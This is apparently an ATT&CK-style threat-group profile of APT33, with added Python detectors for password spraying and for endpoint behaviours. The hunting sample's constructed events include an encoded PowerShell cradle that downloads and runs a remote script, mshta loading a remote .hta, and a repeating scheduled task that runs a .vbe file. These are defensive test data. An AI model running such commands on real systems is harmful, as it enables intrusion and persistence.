APT33

APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.[1][2]

ID: G0064
Associated Groups: Elfin
Version: 1.2

Associated Group Descriptions

Name Description
Elfin [4]

Techniques Used

Domain ID Name Use
Enterprise T1110 Brute Force APT33 has used password spraying to gain access to target systems.[3]
Enterprise T1043 Commonly Used Port APT33 has used port 443 for command and control.[3]
Enterprise T1003 Credential Dumping APT33 has used a variety of publicly available tools like LaZagne, Mimikatz, Gpppassword, SniffPass, and ProcDump to dump credentials.[4][3]
Enterprise T1002 Data Compressed APT33 has used WinRAR to compress data prior to exfiltration.[4]
Enterprise T1132 Data Encoding APT33 has used base64 to encode command and control traffic.[3]
Enterprise T1480 Execution Guardrails APT33 has used kill dates in their malware to guardrail execution.[3]
Enterprise T1048 Exfiltration Over Alternative Protocol APT33 has used FTP to exfiltrate files (separately from the C2 channel).[4]
Enterprise T1203 Exploitation for Client Execution APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250).[4]
Enterprise T1068 Exploitation for Privilege Escalation APT33 has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system.[3]
Enterprise T1040 Network Sniffing APT33 has used SniffPass to collect credentials by sniffing network traffic.[4]
Enterprise T1027 Obfuscated Files or Information APT33 has used base64 to encode payloads.[3]
Enterprise T1086 PowerShell APT33 has utilized PowerShell to download files from the C2 server and run various scripts.[4]
Enterprise T1060 Registry Run Keys / Startup Folder APT33 has deployed a tool known as DarkComet to the Startup folder of a victim.[4]
Enterprise T1105 Remote File Copy APT33 has downloaded additional files and programs from its C2 server.[4]
Enterprise T1053 Scheduled Task APT33 has created a scheduled task to execute a .vbe file multiple times a day.[4]
Enterprise T1192 Spearphishing Link APT33 has sent spearphishing emails containing links to .hta files.[1][4]
Enterprise T1071 Standard Application Layer Protocol APT33 has used HTTP for command and control.[4]
Enterprise T1032 Standard Cryptographic Protocol APT33 has used AES for encryption of command and control traffic.[3]
Enterprise T1065 Uncommonly Used Port APT33 has used ports 808 and 880 for command and control.[4]
Enterprise T1204 User Execution APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.[1][4]
Enterprise T1078 Valid Accounts APT33 has used valid accounts for initial access and privilege escalation.[2][3]
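The T1110 row above says APT33 gains initial access by password spraying: one source tries a small number of common passwords against many accounts, staying under per-account lockout thresholds. Spraying shows up in authentication logs as a wide, shallow failure pattern rather than the deep pattern of single-account brute force. The following is an added detection example written for this page (not code from the ATT&CK entry or from the cited reports); the logon-failure lines are constructed, and the one-line field layout, the window and thresholds, and the function names are assumptions.

```python
"""Password-spray detection over logon-failure records, illustrating T1110
as used by APT33. Added example: not code from the ATT&CK page or from
the cited reports. The log lines are constructed; the one-line field
layout, the thresholds and the function names are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample: Windows Event ID 4625 (logon failure) flattened to one
# line per event. 203.0.113.7 tries six accounts once each (a spray),
# 198.51.100.9 hammers one account (brute force, not a spray) and 192.0.2.4 is
# a single mistyped password. Addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
2019-03-20T08:00:01Z 4625 user=alice src=203.0.113.7 status=0xC000006D
2019-03-20T08:00:03Z 4625 user=bob src=203.0.113.7 status=0xC000006D
2019-03-20T08:00:05Z 4625 user=carol src=203.0.113.7 status=0xC000006D
2019-03-20T08:00:07Z 4625 user=dave src=203.0.113.7 status=0xC000006D
2019-03-20T08:00:09Z 4625 user=erin src=203.0.113.7 status=0xC000006D
2019-03-20T08:00:11Z 4625 user=frank src=203.0.113.7 status=0xC000006D
2019-03-20T08:00:12Z 4625 user=admin src=198.51.100.9 status=0xC000006D
2019-03-20T08:00:14Z 4625 user=admin src=198.51.100.9 status=0xC000006D
2019-03-20T08:00:16Z 4625 user=admin src=198.51.100.9 status=0xC000006D
2019-03-20T08:00:18Z 4625 user=admin src=198.51.100.9 status=0xC000006D
2019-03-20T08:00:20Z 4625 user=admin src=198.51.100.9 status=0xC000006D
2019-03-20T08:00:22Z 4625 user=admin src=198.51.100.9 status=0xC000006D
2019-03-20T08:00:24Z 4625 user=admin src=198.51.100.9 status=0xC000006D
2019-03-20T08:00:26Z 4625 user=admin src=198.51.100.9 status=0xC000006D
2019-03-20T08:00:30Z 4625 user=grace src=192.0.2.4 status=0xC000006D
"""

LINE = re.compile(r"^(\S+) 4625 user=(\S+) src=(\S+) status=(\S+)$")


def parse_log(text):
    """Parse the constructed one-line-per-event format into dicts."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # ignore anything that is not a 4625 in this layout
        ts, user, src, status = m.groups()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "user": user.lower(), "src": src, "status": status})
    return events


def detect_password_spray(events, window=timedelta(minutes=30),
                          min_users=5, max_per_user=2):
    """Flag sources that fail against many distinct accounts, each only a few
    times, inside one window. A spray is wide and shallow, so the per-user cap
    is what separates it from single-account brute force (many failures, one
    user), which lockout policies already catch."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append(ev)
    findings = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        counts = defaultdict(int)   # failures per user inside the window
        start, best = 0, None
        for end, ev in enumerate(evs):
            counts[ev["user"]] += 1
            # Slide the window start forward until it fits inside `window`.
            while ev["ts"] - evs[start]["ts"] > window:
                old = evs[start]["user"]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            distinct = len(counts)
            if distinct >= min_users and max(counts.values()) <= max_per_user:
                if best is None or distinct > best["distinct_users"]:
                    best = {"src": src, "distinct_users": distinct,
                            "users": sorted(counts),
                            "first": evs[start]["ts"], "last": ev["ts"]}
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(parse_log(SAMPLE_LOG)):
        print(f"spray from {f['src']}: {f['distinct_users']} accounts "
              f"between {f['first']:%H:%M:%S} and {f['last']:%H:%M:%S}")
```

The per-user cap is the important knob: a source that fails eight times against one account is a lockout event, not a spray, and raising `max_per_user` too far merges the two. In practice sprays against internet-facing services (OWA, ADFS, VPN) land in those services' logs rather than in 4625 on a domain controller, and a patient attacker will spread attempts across hours, so the window should be sized to the authentication source being watched.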
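Several rows of the table describe endpoint behaviour that is visible in process-creation and network-connection telemetry: mshta.exe launching an .hta from a spearphishing link (T1192/T1204), a scheduled task that repeatedly runs a .vbe file (T1053), PowerShell downloading files from C2 with base64-encoded payloads (T1086/T1027), beaconing on ports 808 and 880 (T1065), and FTP exfiltration outside the C2 channel (T1048). The block below is an added hunting example written for this page, not code from the ATT&CK entry or the cited reports; the Sysmon-shaped event records, the paths, hosts and addresses, the byte threshold for FTP, and the rule and function names are all constructed assumptions.

```python
"""Endpoint-telemetry hunt for several APT33 behaviours listed in the table.
Added example, not code from the page or any vendor report. Event records,
field names and tuning choices below are constructed assumptions."""
import base64
import re

# Constructed sample telemetry shaped like Sysmon process-creation ("process")
# and network-connection ("net") records. Paths, hosts and addresses are made
# up (RFC 5737 / RFC 2606 reserved ranges); none come from a real intrusion.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
    .encode("utf-16-le")).decode()

EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": "mshta.exe http://invoice.example.invalid/view.hta"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks /create /sc minute /mo 240 /tn "WinUpdate" /tr "wscript.exe C:\Users\Public\upd.vbe"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _ENC},
    {"type": "net", "image": r"C:\Users\Public\upd.exe", "dst_ip": "203.0.113.10",
     "dst_port": 880, "bytes_out": 3_072},
    {"type": "net", "image": r"C:\Users\Public\upd.exe", "dst_ip": "203.0.113.10",
     "dst_port": 21, "bytes_out": 52_428_800},
    # Benign controls that the rules must not flag.
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Tools\backup.exe"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
    {"type": "net", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "198.51.100.20", "dst_port": 443, "bytes_out": 4_096},
]

C2_PORTS = {808, 880}               # the ports named in the T1065 row
MAIL_CLIENTS = ("outlook.exe", "thunderbird.exe")
SCRIPT_EXT = re.compile(r"\.(vbe|vbs|hta|js|jse|wsf)\b", re.I)
# -EncodedCommand and the abbreviations PowerShell accepts for it.
ENC_FLAG = re.compile(r"\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
FTP_EXFIL_BYTES = 10 * 1024 * 1024  # assumed tuning threshold, not from the page


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: bad padding or alphabet
        return None


def hunt(events):
    """One rule per table row of interest; returns (technique, detail) pairs."""
    hits = []
    for ev in events:
        img = ev["image"].lower().rsplit("\\", 1)[-1]
        cmd = ev.get("cmdline", "")
        if ev["type"] == "process":
            parent = ev["parent"].lower().rsplit("\\", 1)[-1]
            # T1192/T1204: mshta.exe fetching an .hta from a URL, spawned by a mail client.
            if img == "mshta.exe" and parent in MAIL_CLIENTS and re.search(r"https?://\S+\.hta", cmd, re.I):
                hits.append(("T1192", f"mshta from {parent}: {cmd}"))
            # T1053: schtasks creating a frequently repeating task that runs a script file.
            if img == "schtasks.exe" and re.search(r"/sc\s+(minute|hourly)", cmd, re.I) and SCRIPT_EXT.search(cmd):
                hits.append(("T1053", f"repeating task running script: {cmd}"))
            # T1086/T1027: encoded PowerShell whose decoded body pulls more code from C2.
            if img == "powershell.exe":
                body = decode_encoded_command(cmd)
                if body and re.search(r"DownloadString|DownloadFile|WebClient|IEX", body, re.I):
                    hits.append(("T1086", f"encoded download cradle: {body}"))
        else:  # network connection
            # T1065: beaconing to the non-standard ports listed for this group.
            if ev["dst_port"] in C2_PORTS:
                hits.append(("T1065", f"{img} -> {ev['dst_ip']}:{ev['dst_port']}"))
            # T1048: bulk outbound FTP, the separate exfiltration channel in the T1048 row.
            if ev["dst_port"] == 21 and ev["bytes_out"] >= FTP_EXFIL_BYTES:
                hits.append(("T1048", f"{img} sent {ev['bytes_out']} bytes over FTP"))
    return hits


if __name__ == "__main__":
    for technique, detail in hunt(EVENTS):
        print(technique, detail)
```

Each rule keys on the relationship the table describes rather than on a hash or hostname: mshta.exe is only suspicious here because a mail client spawned it with a URL, schtasks is only suspicious because the task both repeats and runs a script, and the encoded PowerShell is decoded before matching so that the base64 wrapper (the T1027 row) does not hide the download cradle. The two port rules are the weakest, since 808 and 880 are operator choices that can change between campaigns; they belong in a hunt, not a high-confidence alert.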

Software

ID Name References Techniques
S0129 AutoIt backdoor [4] Bypass User Account Control, Data Encoding, File and Directory Discovery, PowerShell
S0363 Empire [3] [4] Access Token Manipulation, Accessibility Features, Account Discovery, Browser Bookmark Discovery, Bypass User Account Control, Clipboard Data, Command-Line Interface, Commonly Used Port, Create Account, Credential Dumping, Credentials in Files, Data Compressed, Distributed Component Object Model, DLL Search Order Hijacking, Domain Trust Discovery, Email Collection, Execution through API, Exfiltration Over Alternative Protocol, Exfiltration Over Command and Control Channel, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Group Policy Modification, Hooking, Input Capture, Kerberoasting, LLMNR/NBT-NS Poisoning and Relay, Modify Existing Service, Network Service Scanning, Network Share Discovery, Network Sniffing, Obfuscated Files or Information, Pass the Hash, Pass the Ticket, Path Interception, PowerShell, Private Keys, Process Discovery, Process Injection, Registry Run Keys / Startup Folder, Remote File Copy, Remote Services, Scheduled Task, Screen Capture, Scripting, Security Software Discovery, Security Support Provider, Service Execution, Shortcut Modification, SID-History Injection, Standard Application Layer Protocol, Standard Cryptographic Protocol, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, Timestomp, Trusted Developer Utilities, Video Capture, Web Service, Windows Management Instrumentation
S0095 FTP [4] Commonly Used Port, Exfiltration Over Alternative Protocol
S0349 LaZagne [4] Credential Dumping, Credentials in Files
S0002 Mimikatz [4] Account Manipulation, Credential Dumping, Credentials in Files, DCShadow, Pass the Hash, Pass the Ticket, Private Keys, Security Support Provider, SID-History Injection
S0336 NanoCore [2] Audio Capture, Command-Line Interface, Disabling Security Tools, Input Capture, Modify Registry, Obfuscated Files or Information, Registry Run Keys / Startup Folder, Remote File Copy, Scripting, Standard Cryptographic Protocol, System Network Configuration Discovery, Uncommonly Used Port, Video Capture
S0039 Net [4] Account Discovery, Create Account, Network Share Connection Removal, Network Share Discovery, Password Policy Discovery, Permission Groups Discovery, Remote System Discovery, Service Execution, System Network Connections Discovery, System Service Discovery, System Time Discovery, Windows Admin Shares
S0198 NETWIRE [1] [2] Code Signing, Input Capture, Registry Run Keys / Startup Folder, Screen Capture, System Information Discovery
S0378 PoshC2 [3] [4] Access Token Manipulation, Account Discovery, Automated Collection, Brute Force, Bypass User Account Control, Connection Proxy, Credential Dumping, Credentials in Files, Data Compressed, Domain Trust Discovery, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Input Capture, LLMNR/NBT-NS Poisoning and Relay, Network Service Scanning, Network Sniffing, Pass the Hash, Password Policy Discovery, Permission Groups Discovery, Process Injection, Service Execution, Standard Application Layer Protocol, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Service Discovery, Windows Management Instrumentation, Windows Management Instrumentation Event Subscription
S0194 PowerSploit [3] Access Token Manipulation, Account Discovery, Audio Capture, Credential Dumping, Credentials in Registry, Data from Local System, DLL Search Order Hijacking, Domain Trust Discovery, Indicator Removal from Tools, Input Capture, Kerberoasting, Modify Existing Service, Obfuscated Files or Information, Path Interception, PowerShell, Process Discovery, Process Injection, Query Registry, Registry Run Keys / Startup Folder, Scheduled Task, Screen Capture, Security Support Provider, Windows Management Instrumentation
S0371 POWERTON [3] Commonly Used Port, Credential Dumping, PowerShell, Registry Run Keys / Startup Folder, Standard Application Layer Protocol, Standard Cryptographic Protocol, Windows Management Instrumentation Event Subscription
S0192 Pupy [3] Access Token Manipulation, Account Discovery, Audio Capture, Bypass User Account Control, Create Account, Credential Dumping, Data Compressed, Email Collection, Exfiltration Over Command and Control Channel, File and Directory Discovery, Indicator Removal on Host, Input Capture, LLMNR/NBT-NS Poisoning and Relay, Multilayer Encryption, Network Service Scanning, Network Share Discovery, PowerShell, Process Discovery, Process Injection, Registry Run Keys / Startup Folder, Remote Desktop Protocol, Remote File Copy, Screen Capture, Scripting, Service Execution, Standard Application Layer Protocol, Standard Cryptographic Protocol, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, Systemd Service, Video Capture, Virtualization/Sandbox Evasion
S0358 Ruler [3] Email Collection, Office Application Startup
S0140 Shamoon [4] Bypass User Account Control, Commonly Used Port, Data Destruction, Data Encrypted for Impact, Disk Structure Wipe, Masquerading, Modify Registry, New Service, Obfuscated Files or Information, Query Registry, Remote File Copy, Remote System Discovery, Scheduled Task, Service Execution, Standard Application Layer Protocol, System Information Discovery, System Network Configuration Discovery, System Time Discovery, Valid Accounts, Windows Admin Shares
S0380 StoneDrill [1] Data Destruction, Disk Content Wipe, Disk Structure Wipe, File Deletion, Obfuscated Files or Information, Process Injection, Query Registry, Remote File Copy, Screen Capture, Scripting, Security Software Discovery, System Information Discovery, System Time Discovery, Virtualization/Sandbox Evasion, Windows Management Instrumentation
S0199 TURNEDUP [1] [2] [4] Command-Line Interface, Process Injection, Registry Run Keys / Startup Folder, Remote File Copy, Screen Capture, System Information Discovery

References